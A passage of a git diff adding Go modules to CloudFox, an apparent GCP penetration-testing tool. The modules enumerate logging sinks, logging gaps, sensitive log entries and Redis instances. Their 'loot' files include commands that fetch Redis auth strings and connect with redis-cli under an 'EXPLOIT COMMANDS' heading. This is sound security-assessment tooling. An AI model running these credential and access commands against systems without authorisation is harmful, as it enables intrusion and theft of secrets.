+ } + return all +} + +func (m *LogEnumModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Scanning logs in project: %s", projectID), globals.GCP_LOGGINGENUM_MODULE_NAME) + } + + svc := logenumservice.New() + + entries, err := svc.EnumerateSensitiveLogs(projectID, m.Hours, m.MaxEntries, m.LogNameFilter) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGGINGENUM_MODULE_NAME, + fmt.Sprintf("Could not scan logs in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectEntries[projectID] = entries + + // Build loot + if len(entries) > 0 { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + lootFile := &internal.LootFile{ + Name: "logging-enum-commands", + Contents: "# Cloud Logging Read Commands for Sensitive Entries\n# Generated by CloudFox\n\n", + } + for _, entry := range entries { + lootFile.Contents += fmt.Sprintf( + "# [%s] %s - %s (%s)\ngcloud logging read 'insertId=\"%s\"' --project=%s --format=json\n\n", + entry.RiskLevel, entry.Category, entry.Description, entry.Timestamp, + entry.InsertID, projectID, + ) + } + m.LootMap[projectID]["logging-enum-commands"] = lootFile + } + m.mu.Unlock() +} + +func (m *LogEnumModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *LogEnumModule) getHeader() []string { + return []string{"Project", "Log Name", "Timestamp", "Category", "Risk Level", "Description", "Resource Type", "Snippet"} +} + +func (m *LogEnumModule) entriesToTableBody(entries []logenumservice.SensitiveLogEntry) [][]string { + var body [][]string + for _, entry := range entries { + // Shorten log name for display + shortLogName := entry.LogName + if idx := 
strings.LastIndex(shortLogName, "/"); idx >= 0 { + shortLogName = shortLogName[idx+1:] + } + body = append(body, []string{ + m.GetProjectName(entry.ProjectID), + shortLogName, + entry.Timestamp, + entry.Category, + entry.RiskLevel, + entry.Description, + entry.ResourceType, + entry.Snippet, + }) + } + return body +} + +func (m *LogEnumModule) buildTablesForProject(projectID string) []internal.TableFile { + entries := m.ProjectEntries[projectID] + if len(entries) == 0 { + return nil + } + return []internal.TableFile{ + { + Name: "logging-enum", + Header: m.getHeader(), + Body: m.entriesToTableBody(entries), + }, + } +} + +func (m *LogEnumModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, entries := range m.ProjectEntries { + if len(entries) == 0 { + continue + } + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = LogEnumOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_LOGGINGENUM_MODULE_NAME) + } +} + +func (m *LogEnumModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allEntries := m.getAllEntries() + if len(allEntries) == 0 { + return + } + + tables := []internal.TableFile{ + { + Name: "logging-enum", + Header: m.getHeader(), + Body: m.entriesToTableBody(allEntries), + }, + } + + var lootFiles []internal.LootFile + 
for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := LogEnumOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_LOGGINGENUM_MODULE_NAME) + } +} diff --git a/gcp/commands/logging.go b/gcp/commands/logging.go new file mode 100644 index 00000000..38e61632 --- /dev/null +++ b/gcp/commands/logging.go @@ -0,0 +1,658 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + LoggingService "github.com/BishopFox/cloudfox/gcp/services/loggingService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPLoggingCommand = &cobra.Command{ + Use: globals.GCP_LOGGING_MODULE_NAME, + Aliases: []string{"logs", "sinks", "log-sinks", "logging-gaps"}, + Short: "Enumerate Cloud Logging configuration including sinks, metrics, and logging gaps", + Long: `Enumerate Cloud Logging configuration across projects including sinks, metrics, and logging gaps. 
+ +Features: +- Lists all logging sinks (log exports) +- Shows sink destinations (Storage, BigQuery, Pub/Sub, Logging buckets) +- Identifies cross-project log exports +- Shows sink filters and exclusions +- Lists log-based metrics for alerting +- Identifies resources with missing or incomplete logging +- Generates gcloud commands for logging enumeration + +Log Sinks: +- Destination: Where logs are exported (bucket, dataset, topic) +- CrossProject: Whether logs are exported to another project +- WriterIdentity: Service account used for export +- Filter: What logs are included/excluded + +Logging Gaps (resources with incomplete logging): +- Cloud Storage buckets without access logging +- VPC subnets without flow logs +- GKE clusters with incomplete logging configuration +- Cloud SQL instances without query/connection logging + +Security Considerations: +- Cross-project exports may leak logs to external projects +- Sink writer identity may have excessive permissions +- Disabled sinks may indicate log evasion +- Missing logging on resources creates detection blind spots`, + Run: runGCPLoggingCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type LoggingModule struct { + gcpinternal.BaseGCPModule + + ProjectSinks map[string][]LoggingService.SinkInfo // projectID -> sinks + ProjectMetrics map[string][]LoggingService.MetricInfo // projectID -> metrics + ProjectGaps map[string][]LoggingService.LoggingGap // projectID -> logging gaps + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type LoggingOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o LoggingOutput) TableFiles() []internal.TableFile { return o.Table } +func (o LoggingOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ 
+func runGCPLoggingCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_LOGGING_MODULE_NAME) + if err != nil { + return + } + + module := &LoggingModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectSinks: make(map[string][]LoggingService.SinkInfo), + ProjectMetrics: make(map[string][]LoggingService.MetricInfo), + ProjectGaps: make(map[string][]LoggingService.LoggingGap), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *LoggingModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_LOGGING_MODULE_NAME, m.processProject) + + allSinks := m.getAllSinks() + allMetrics := m.getAllMetrics() + allGaps := m.getAllGaps() + + if len(allSinks) == 0 && len(allMetrics) == 0 && len(allGaps) == 0 { + logger.InfoM("No logging configuration found", globals.GCP_LOGGING_MODULE_NAME) + return + } + + // Count interesting sinks + crossProjectCount := 0 + disabledCount := 0 + for _, sink := range allSinks { + if sink.IsCrossProject { + crossProjectCount++ + } + if sink.Disabled { + disabledCount++ + } + } + + msg := fmt.Sprintf("Found %d sink(s), %d metric(s), %d logging gap(s)", len(allSinks), len(allMetrics), len(allGaps)) + if crossProjectCount > 0 { + msg += fmt.Sprintf(" [%d cross-project]", crossProjectCount) + } + if disabledCount > 0 { + msg += fmt.Sprintf(" [%d disabled]", disabledCount) + } + logger.SuccessM(msg, globals.GCP_LOGGING_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// getAllSinks returns all sinks from all projects +func (m *LoggingModule) getAllSinks() []LoggingService.SinkInfo { + var all []LoggingService.SinkInfo + for _, sinks := range m.ProjectSinks { + all = append(all, sinks...) 
+ } + return all +} + +// getAllMetrics returns all metrics from all projects +func (m *LoggingModule) getAllMetrics() []LoggingService.MetricInfo { + var all []LoggingService.MetricInfo + for _, metrics := range m.ProjectMetrics { + all = append(all, metrics...) + } + return all +} + +// getAllGaps returns all logging gaps from all projects +func (m *LoggingModule) getAllGaps() []LoggingService.LoggingGap { + var all []LoggingService.LoggingGap + for _, gaps := range m.ProjectGaps { + all = append(all, gaps...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *LoggingModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Logging in project: %s", projectID), globals.GCP_LOGGING_MODULE_NAME) + } + + ls := LoggingService.New() + + var projectSinks []LoggingService.SinkInfo + var projectMetrics []LoggingService.MetricInfo + var projectGaps []LoggingService.LoggingGap + + // Get sinks + sinks, err := ls.Sinks(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGGING_MODULE_NAME, + fmt.Sprintf("Could not enumerate logging sinks in project %s", projectID)) + } else { + projectSinks = append(projectSinks, sinks...) + } + + // Get metrics + metrics, err := ls.Metrics(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGGING_MODULE_NAME, + fmt.Sprintf("Could not enumerate log metrics in project %s", projectID)) + } else { + projectMetrics = append(projectMetrics, metrics...) 
+ } + + // Get logging gaps + gaps, err := ls.LoggingGaps(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGGING_MODULE_NAME, + fmt.Sprintf("Could not enumerate logging gaps in project %s", projectID)) + } + } else { + projectGaps = append(projectGaps, gaps...) + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectSinks[projectID] = projectSinks + m.ProjectMetrics[projectID] = projectMetrics + m.ProjectGaps[projectID] = projectGaps + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["logging-commands"] = &internal.LootFile{ + Name: "logging-commands", + Contents: "# Cloud Logging Enumeration Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + m.generateLootCommands(projectID, projectSinks, projectMetrics, projectGaps) + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d sink(s), %d metric(s), %d gap(s) in project %s", len(projectSinks), len(projectMetrics), len(projectGaps), projectID), globals.GCP_LOGGING_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *LoggingModule) generateLootCommands(projectID string, sinks []LoggingService.SinkInfo, metrics []LoggingService.MetricInfo, gaps []LoggingService.LoggingGap) { + lootFile := m.LootMap[projectID]["logging-commands"] + if lootFile == nil { + return + } + + // Project-level logging enumeration + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# PROJECT: %s\n"+ + "# =============================================================================\n\n", projectID) + + // Sinks enumeration commands + lootFile.Contents += "# === LOG SINKS ===\n\n" + 
lootFile.Contents += fmt.Sprintf("gcloud logging sinks list --project=%s\n\n", projectID) + + for _, sink := range sinks { + lootFile.Contents += fmt.Sprintf("# Sink: %s (%s)\n", sink.Name, sink.DestinationType) + lootFile.Contents += fmt.Sprintf("gcloud logging sinks describe %s --project=%s\n", sink.Name, projectID) + + // Add destination-specific enumeration commands + switch sink.DestinationType { + case "storage": + if sink.DestinationBucket != "" { + lootFile.Contents += fmt.Sprintf("# Check bucket logging destination:\ngsutil ls gs://%s/\n", sink.DestinationBucket) + } + case "bigquery": + if sink.DestinationDataset != "" { + destProject := sink.DestinationProject + if destProject == "" { + destProject = projectID + } + lootFile.Contents += fmt.Sprintf("# Check BigQuery logging destination:\nbq ls %s:%s\n", destProject, sink.DestinationDataset) + } + case "pubsub": + if sink.DestinationTopic != "" { + destProject := sink.DestinationProject + if destProject == "" { + destProject = projectID + } + lootFile.Contents += fmt.Sprintf("# Check Pub/Sub logging destination:\ngcloud pubsub topics describe %s --project=%s\n", sink.DestinationTopic, destProject) + } + } + + if sink.IsCrossProject { + lootFile.Contents += fmt.Sprintf("# NOTE: Cross-project export to %s\n", sink.DestinationProject) + } + lootFile.Contents += "\n" + } + + // Metrics enumeration commands + if len(metrics) > 0 { + lootFile.Contents += "# === LOG-BASED METRICS ===\n\n" + lootFile.Contents += fmt.Sprintf("gcloud logging metrics list --project=%s\n\n", projectID) + + for _, metric := range metrics { + lootFile.Contents += fmt.Sprintf("# Metric: %s\n", metric.Name) + lootFile.Contents += fmt.Sprintf("gcloud logging metrics describe %s --project=%s\n\n", metric.Name, projectID) + } + } + + // Logging gaps enumeration commands + if len(gaps) > 0 { + lootFile.Contents += "# === LOGGING GAPS ===\n\n" + lootFile.Contents += "# Commands to verify logging configuration on resources with gaps\n\n" + + 
for _, gap := range gaps { + lootFile.Contents += fmt.Sprintf("# %s: %s (%s) - %s\n", gap.ResourceType, gap.ResourceName, gap.Location, gap.LoggingStatus) + lootFile.Contents += fmt.Sprintf("# Missing: %s\n", strings.Join(gap.MissingLogs, ", ")) + + switch gap.ResourceType { + case "bucket": + lootFile.Contents += fmt.Sprintf("gsutil logging get gs://%s\n", gap.ResourceName) + case "subnet": + lootFile.Contents += fmt.Sprintf("gcloud compute networks subnets describe %s --region=%s --project=%s --format='value(logConfig)'\n", gap.ResourceName, gap.Location, projectID) + case "gke": + lootFile.Contents += fmt.Sprintf("gcloud container clusters describe %s --location=%s --project=%s --format='value(loggingService,loggingConfig)'\n", gap.ResourceName, gap.Location, projectID) + case "cloudsql": + lootFile.Contents += fmt.Sprintf("gcloud sql instances describe %s --project=%s --format='value(settings.databaseFlags)'\n", gap.ResourceName, projectID) + } + lootFile.Contents += "\n" + } + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *LoggingModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getSinksHeader returns the header for sinks table +func (m *LoggingModule) getSinksHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Sink Name", + "Destination Type", + "Destination", + "Cross-Project", + "Disabled", + "Writer Identity", + "Filter", + } +} + +// getMetricsHeader returns the header for metrics table +func (m *LoggingModule) getMetricsHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Metric Name", + "Description", + "Filter", + "Type", + } +} + +// getGapsHeader returns the header for logging gaps table +func (m *LoggingModule) getGapsHeader() []string { + return []string{ + "Project", + "Type", + 
"Resource", + "Location", + "Status", + "Missing Logs", + } +} + +// sinksToTableBody converts sinks to table body rows +func (m *LoggingModule) sinksToTableBody(sinks []LoggingService.SinkInfo) [][]string { + var body [][]string + for _, sink := range sinks { + // Format destination + destination := getDestinationName(sink) + + // Format cross-project + crossProject := "No" + if sink.IsCrossProject { + crossProject = fmt.Sprintf("Yes -> %s", sink.DestinationProject) + } + + // Format disabled + disabled := "No" + if sink.Disabled { + disabled = "Yes" + } + + // Format filter (no truncation) + filter := "-" + if sink.Filter != "" { + filter = normalizeFilter(sink.Filter) + } + + // Format writer identity + writerIdentity := "-" + if sink.WriterIdentity != "" { + writerIdentity = sink.WriterIdentity + } + + body = append(body, []string{ + m.GetProjectName(sink.ProjectID), + sink.ProjectID, + sink.Name, + sink.DestinationType, + destination, + crossProject, + disabled, + writerIdentity, + filter, + }) + } + return body +} + +// metricsToTableBody converts metrics to table body rows +func (m *LoggingModule) metricsToTableBody(metrics []LoggingService.MetricInfo) [][]string { + var body [][]string + for _, metric := range metrics { + // Format filter (no truncation) + filter := "-" + if metric.Filter != "" { + filter = normalizeFilter(metric.Filter) + } + + // Format type + metricType := metric.MetricKind + if metric.ValueType != "" { + metricType += "/" + metric.ValueType + } + + // Format description (no truncation) + description := metric.Description + if description == "" { + description = "-" + } + + body = append(body, []string{ + m.GetProjectName(metric.ProjectID), + metric.ProjectID, + metric.Name, + description, + filter, + metricType, + }) + } + return body +} + +// gapsToTableBody converts logging gaps to table body rows +func (m *LoggingModule) gapsToTableBody(gaps []LoggingService.LoggingGap) [][]string { + var body [][]string + for _, gap := range gaps { 
+ missingLogs := strings.Join(gap.MissingLogs, "; ") + + location := gap.Location + if location == "" { + location = "-" + } + + body = append(body, []string{ + m.GetProjectName(gap.ProjectID), + gap.ResourceType, + gap.ResourceName, + location, + gap.LoggingStatus, + missingLogs, + }) + } + return body +} + +// buildTablesForProject builds table files for a project +func (m *LoggingModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if sinks, ok := m.ProjectSinks[projectID]; ok && len(sinks) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_LOGGING_MODULE_NAME + "-sinks", + Header: m.getSinksHeader(), + Body: m.sinksToTableBody(sinks), + }) + } + + if metrics, ok := m.ProjectMetrics[projectID]; ok && len(metrics) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_LOGGING_MODULE_NAME + "-metrics", + Header: m.getMetricsHeader(), + Body: m.metricsToTableBody(metrics), + }) + } + + if gaps, ok := m.ProjectGaps[projectID]; ok && len(gaps) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_LOGGING_MODULE_NAME + "-gaps", + Header: m.getGapsHeader(), + Body: m.gapsToTableBody(gaps), + }) + } + + return tableFiles +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *LoggingModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all projects that have data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectSinks { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectMetrics { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectGaps { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { 
+ tableFiles := m.buildTablesForProject(projectID) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = LoggingOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_LOGGING_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *LoggingModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allSinks := m.getAllSinks() + allMetrics := m.getAllMetrics() + allGaps := m.getAllGaps() + + // Build table files + tableFiles := []internal.TableFile{} + + if len(allSinks) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_LOGGING_MODULE_NAME + "-sinks", + Header: m.getSinksHeader(), + Body: m.sinksToTableBody(allSinks), + }) + } + + if len(allMetrics) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_LOGGING_MODULE_NAME + "-metrics", + Header: m.getMetricsHeader(), + Body: m.metricsToTableBody(allMetrics), + }) + } + + if len(allGaps) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_LOGGING_MODULE_NAME + "-gaps", + Header: m.getGapsHeader(), + Body: m.gapsToTableBody(allGaps), + }) + } + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && 
!strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := LoggingOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_LOGGING_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// Helper functions + +// getDestinationName returns a human-readable destination name +func getDestinationName(sink LoggingService.SinkInfo) string { + switch sink.DestinationType { + case "storage": + return sink.DestinationBucket + case "bigquery": + return sink.DestinationDataset + case "pubsub": + return sink.DestinationTopic + case "logging": + // Extract bucket name from full path + parts := strings.Split(sink.Destination, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return sink.Destination + default: + return sink.Destination + } +} + +// normalizeFilter normalizes a log filter for display (removes newlines but no truncation) +func normalizeFilter(filter string) string { + // Remove newlines + filter = strings.ReplaceAll(filter, "\n", " ") + filter = strings.ReplaceAll(filter, "\t", " ") + + // Collapse multiple spaces + for strings.Contains(filter, " ") { + filter = strings.ReplaceAll(filter, " ", " ") + } + + return strings.TrimSpace(filter) +} diff --git a/gcp/commands/memorystore.go b/gcp/commands/memorystore.go new file mode 100644 index 00000000..3d748cec --- /dev/null +++ b/gcp/commands/memorystore.go @@ -0,0 +1,292 @@ +package commands + +import ( + "github.com/BishopFox/cloudfox/gcp/shared" + "context" + "fmt" + "strings" + "sync" + + memorystoreservice 
"github.com/BishopFox/cloudfox/gcp/services/memorystoreService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPMemorystoreCommand = &cobra.Command{ + Use: globals.GCP_MEMORYSTORE_MODULE_NAME, + Aliases: []string{"redis", "cache"}, + Short: "Enumerate Memorystore (Redis) instances", + Long: `Enumerate Memorystore for Redis instances with security analysis. + +Features: +- Lists all Redis instances +- Shows authentication and encryption status +- Identifies network configuration +- Detects security misconfigurations`, + Run: runGCPMemorystoreCommand, +} + +type MemorystoreModule struct { + gcpinternal.BaseGCPModule + ProjectInstances map[string][]memorystoreservice.RedisInstanceInfo // projectID -> instances + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +type MemorystoreOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o MemorystoreOutput) TableFiles() []internal.TableFile { return o.Table } +func (o MemorystoreOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPMemorystoreCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_MEMORYSTORE_MODULE_NAME) + if err != nil { + return + } + + module := &MemorystoreModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectInstances: make(map[string][]memorystoreservice.RedisInstanceInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *MemorystoreModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_MEMORYSTORE_MODULE_NAME, m.processProject) + + allInstances := m.getAllInstances() + if len(allInstances) == 0 { + logger.InfoM("No Memorystore instances found", 
globals.GCP_MEMORYSTORE_MODULE_NAME) + return + } + + noAuth := 0 + for _, instance := range allInstances { + if !instance.AuthEnabled { + noAuth++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d Redis instance(s) (%d without auth)", + len(allInstances), noAuth), globals.GCP_MEMORYSTORE_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *MemorystoreModule) getAllInstances() []memorystoreservice.RedisInstanceInfo { + var all []memorystoreservice.RedisInstanceInfo + for _, instances := range m.ProjectInstances { + all = append(all, instances...) + } + return all +} + +func (m *MemorystoreModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Memorystore in project: %s", projectID), globals.GCP_MEMORYSTORE_MODULE_NAME) + } + + svc := memorystoreservice.New() + instances, err := svc.ListRedisInstances(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_MEMORYSTORE_MODULE_NAME, + fmt.Sprintf("Could not list Redis instances in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectInstances[projectID] = instances + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["memorystore-commands"] = &internal.LootFile{ + Name: "memorystore-commands", + Contents: "# Memorystore Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, instance := range instances { + m.addInstanceToLoot(projectID, instance) + } + m.mu.Unlock() +} + +func (m *MemorystoreModule) addInstanceToLoot(projectID string, instance memorystoreservice.RedisInstanceInfo) { + lootFile := m.LootMap[projectID]["memorystore-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# 
=============================================================================\n"+ + "# MEMORYSTORE: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Location: %s\n"+ + "# Host: %s:%d\n"+ + "# Auth: %v, Encryption: %s\n\n", + instance.Name, + instance.ProjectID, instance.Location, + instance.Host, instance.Port, + instance.AuthEnabled, instance.TransitEncryption, + ) + + // gcloud commands + lootFile.Contents += fmt.Sprintf( + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe instance:\n"+ + "gcloud redis instances describe %s --region=%s --project=%s\n\n", + instance.Name, instance.Location, instance.ProjectID, + ) + + // Auth string command (if auth enabled) + if instance.AuthEnabled { + lootFile.Contents += fmt.Sprintf( + "# Get auth string:\n"+ + "gcloud redis instances get-auth-string %s --region=%s --project=%s\n\n", + instance.Name, instance.Location, instance.ProjectID, + ) + } + + // Redis CLI connection command + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + authStr := "" + if instance.AuthEnabled { + authStr = " -a $(gcloud redis instances get-auth-string " + instance.Name + + " --region=" + instance.Location + " --project=" + instance.ProjectID + + " --format='value(authString)')" + } + lootFile.Contents += fmt.Sprintf( + "# Connect to Redis (from a VM in the same VPC):\n"+ + "redis-cli -h %s -p %d%s\n\n", + instance.Host, instance.Port, authStr, + ) +} + +// extractNetworkName extracts the network name from the full resource path +func extractNetworkName(network string) string { + if network == "" { + return "-" + } + parts := strings.Split(network, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return network +} + +func (m *MemorystoreModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *MemorystoreModule) 
getTableHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "Tier", + "Memory (GB)", + "Version", + "Host:Port", + "Auth Enabled", + "Transit Encryption", + "State", + "Network", + "Connect Mode", + } +} + +func (m *MemorystoreModule) instancesToTableBody(instances []memorystoreservice.RedisInstanceInfo) [][]string { + var body [][]string + for _, instance := range instances { + transitEncryption := instance.TransitEncryption + if transitEncryption == "" { + transitEncryption = "DISABLED" + } + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Location, + instance.Tier, + fmt.Sprintf("%d", instance.MemorySizeGB), + instance.RedisVersion, + fmt.Sprintf("%s:%d", instance.Host, instance.Port), + shared.BoolToYesNo(instance.AuthEnabled), + transitEncryption, + instance.State, + extractNetworkName(instance.AuthorizedNetwork), + instance.ConnectMode, + }) + } + return body +} + +func (m *MemorystoreModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, instances := range m.ProjectInstances { + body := m.instancesToTableBody(instances) + tableFiles := []internal.TableFile{{Name: "memorystore", Header: m.getTableHeader(), Body: body}} + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = MemorystoreOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, 
